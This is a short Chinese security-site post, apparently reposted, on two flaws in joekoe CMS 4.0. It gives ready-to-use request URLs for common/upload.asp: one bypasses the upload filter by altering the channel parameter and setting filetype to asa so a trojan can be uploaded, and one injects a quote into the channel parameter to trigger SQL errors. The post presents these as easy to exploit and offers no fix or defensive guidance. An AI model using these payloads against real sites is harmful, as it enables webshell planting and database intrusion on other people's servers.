首页 网络安全 安全学院 查看内容

乔客(joekoe) CMS 4.0 的2个高危漏洞

2009-2-4 15:24 552 0

摘要: 来自坏狼安全网 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具...
关键词: channel filetype 然后 会报 变量 thumbinput 漏洞 thumbname fileinput filename

来自坏狼安全网 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具体url可以这样common/upload.asp?channel=use2&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=然后上传[PS:要登陆验证] 2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput= 然后上传,就会报错
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部